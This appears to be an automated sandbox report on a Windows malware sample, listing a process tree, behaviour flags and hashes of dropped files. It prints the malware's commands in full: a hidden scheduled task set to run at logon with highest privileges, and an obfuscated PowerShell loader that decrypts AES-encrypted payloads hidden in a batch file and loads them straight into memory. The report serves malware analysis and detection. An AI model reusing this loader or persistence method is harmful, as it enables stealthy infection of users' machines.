PID:5048 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_861_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_861.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3832
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_861.vbs"3⤵
- Suspicious use of WriteProcessMemory
PID:4928 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_861.bat" "4⤵
- Suspicious use of WriteProcessMemory
PID:756 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JtgTNLQD917Z3OfAalN5p6ncKCNzsah2L8s5ejdS+dc='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jnVmcutmPup+V829XIUyUQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $EAIzG=New-Object System.IO.MemoryStream(,$param_var); $allpB=New-Object System.IO.MemoryStream; $qQadD=New-Object System.IO.Compression.GZipStream($EAIzG, [IO.Compression.CompressionMode]::Decompress); $qQadD.CopyTo($allpB); $qQadD.Dispose(); $EAIzG.Dispose(); $allpB.Dispose(); $allpB.ToArray();}function execute_function($param_var,$param2_var){ $EsoDJ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XgHWj=$EsoDJ.EntryPoint; $XgHWj.Invoke($null, $param2_var);}$MwOvg = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_861.bat';$host.UI.RawUI.WindowTitle = $MwOvg;$kBJQu=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($MwOvg).Split([Environment]::NewLine);foreach ($QatGk in $kBJQu) { if ($QatGk.StartsWith('vwDuqbmIlgDgjzMkEVvn')) { $STSYE=$QatGk.Substring(20); break; }}$payloads_var=[string[]]$STSYE.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "5⤵PID:4964
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3560
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s PcaSvc1⤵PID:2556
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
3KB
MD5
4c10a330054b4aa9a37f63a4053f87d8
SHA1
49617e69ea31bb85d2ee6f9fc142a11c6e416f4a
SHA256
39b674c0a2727ac505dc12e1e9236b3646fe246efef25b1ae1036fd674246286
SHA512
f9f4e16c1eb2d2ca2e6330f0e11770e491f829958e1ebdd4a6f8ddc748c7b07b167680a9c07499b9eda088bf69d99a48e20fac98f36bc5b4cda8195747e3df1b
-
Filesize
50KB
MD5
2143b379fed61ab5450bab1a751798ce
SHA1
32f5b4e8d1387688ee5dec6b3cc6fd27b454f19e
SHA256
a2c739624812ada0913f2fbfe13228e7e42a20efdcb6d5c4e111964f9b620f81
SHA512
0bc39e3b666fdad76bcf4fe7e7729c9e8441aa2808173efc8030ce07c753cb5f7e25d81dd8ec75e7a5b6324b7504ff461e470023551976a2a6a415d6a4859bfa
-
Filesize
2KB
MD5
690b700dfc96df64fefaa604eb5e9164
SHA1
2e4cce0a2781d5903e2bac1c912425a9dad2195d
SHA256
9f32111b998a6bd796d09ec4495566e19f0db135bdd399abe4ec5f2508141d68
SHA512
30ff89aa115f030d856b337c2507c9398ff17560fb3a6fe001cccc253f5a0514165b41b9bfaa0d37e3f8eaf05264c8ec9c54fbde18a7e683fd963059b17757b5
-
Filesize
2KB
MD5
c548ed01ae645adff1598bd0dcfb16c7
SHA1
14c0583817bd5f62190f2e167dff7b1be066c173
SHA256
f126e6f7c0898e5dfcda73ecdd6bd3205c6e9d416d9971e92a403d5bae47c4bb
SHA512
1ba317543c77ba9c385370b6fbdefb3339a9b53db8b9b0ad5415ecd9261c9fbeb7d7efd2c4d1ddb7b50fde73e23c36284755bd604a0c9d339be2112ed3353a65
-
Filesize
2KB
MD5
56fd2bc3a8a94e679815a7ef8d9a6ee3
SHA1
60d4f84e04d5ed2050fa1ac06cdbc41471547d24
SHA256
97fe24084be215a5171782c2addf9a00dcd15b97d269a330b8ac73375f726ef1
SHA512
8a5b06ce81e0eaf385d3ec94561ae431e1f262b8733f7adc2141d74c59d63d02e74d45c35e7ffb1be1c4c999f5983465cc067ee1fedb964844302e5522c76041
-
Filesize
2KB
MD5
c6fd07eb54759e15ea7f5f4dd9a82adf
SHA1
9aa483eea0adec5588c6e0b0f632d6b4f909bdeb
SHA256
acb8c6d1373d893039d6fd4efe8d536708163ae3749b899be0e2f74c5876e216
SHA512
179839e1758814ce0761abe81809552d7647cf58ea16e99b4952b16d44080a6389ba7722ebf18617b1c2c5d38b21b0b62e25ca81f9984aa21d28e00a9422120f
-
Filesize
1KB
MD5
02ff25a2b8922d643cfe94f681a12e7e
SHA1
7c7e4dbe073e6c67330d4c08586c987a687b4188
SHA256
8bf6ebc47146467a46543124876c4b4cd2791c72b785d18ffe67c8b2d230e050
SHA512
8caa6b3cc65aaf591e41f1dc746334a0a6ca904c32a98b7483870912172dbf131e49077cc6238cd436020125be85ca052cc2f69c3298f8972e37e8df51fee2fd
-
Filesize
1KB
MD5
6bd32908cca3ad2cf9607410f5ec2b99
SHA1
e4776891be1e9b7bc1483b6c7ba11e42c6ab1efa
SHA256
29d939da16fb198a4c7c5c11cb06033ad10c92c514de497585638b18fb7c1962
SHA512
db0f2f0deef4c3bd248669001f22132c7ee896ad23132fbe3e68a674a7c100583551174a250eae0004cabdce9023561a0342eeca184a8807340c1ff131b918e3
-
Filesize
1B
MD5
c4ca4238a0b923820dcc509a6f75849b
SHA1
356a192b7913b04c54574d18c28d46e6395428ab
SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
274KB
MD5
e19333732c953dccd21bd997320a7a53
SHA1
93462b009375d7bb5434843b871dc439c9b8555d
SHA256
0556c1dcf0f0928084b9067e210e8b72c79dd02831b70a4f4e81c4e3298ff3d9
SHA512
cde6e8475e5433d51a9f2fb2db3cbf46e86089392344da43e194c3da90005597a56140cd580a2c6edfbcde9a95618c1233160d1ff79d049efcbdad62ee06bdf3
-
Filesize
83KB
MD5
fc1bd57fa57b7b5c512746c7de3fa19a
SHA1
7f794e6459def2dcc346d562aacca372e7282270
SHA256
8977812b16f1e3d827cbce1675d9ad9e2f0370cf27cb3b23b389594739c3b837
SHA512
71a1908e1625c9ef28c5a85ca21dfdadcebfc4ae41b21ba2d11a92e1192a49a819adde6fb30fb9f2e8f4199a264c56e86f9d21a67704f7b25b8dbdd9c43b07d9
-
Filesize
304KB
MD5
74f5686e51d07dab9f43f62081f83003
SHA1
8d6b22e17db345f43ec3db13748c162d3cd1b229
SHA256
52974d82b405f9ebba25b6de26cbf2c59f4ec9e4d6c7059661f9f2f02e29d03e
SHA512
5865a681a5e9b3464351a4d9e5bf18dccf3ed43f288c388decfa8559e496c67a563acadd8b7563e4004fe320298b47842a5a672552f14a95772460f54f782384
-
Filesize
124B
MD5
a18bd6dc1b350c27c0b6b3b97280e05a
SHA1
5942904aba32ab36623722eb18017644755e1f02
SHA256
ef73bc9d025e3d7672a6dee2164fc33f9a2337d8e1b992527c7cffef31604517
SHA512
b84af565893f6bed5389df962a7fd262fa02c4bca09c89bd8708c8ce46aa1bb542d76daa5745ce435b79fc409da1cafd9ae1ff4e9f0ed35a2773bbae7ca58294
-
Filesize
112B
MD5
915c576845b00de7b55928536eb8a5c5
SHA1
d87a9df7bd6a3724f42726c8c09301680e319192
SHA256
b6e404b9cd7d0692adee73269af4645190b4b40a7f4d38ba8184cf9eee9b314d
SHA512
dd0c34e70f8565ee210349c27f787ebf5a9db09472a24020af4096c4f6955cdca9d42a353993158a291255aa0102f97ab85a766bd03e86bb23674573fc0f8334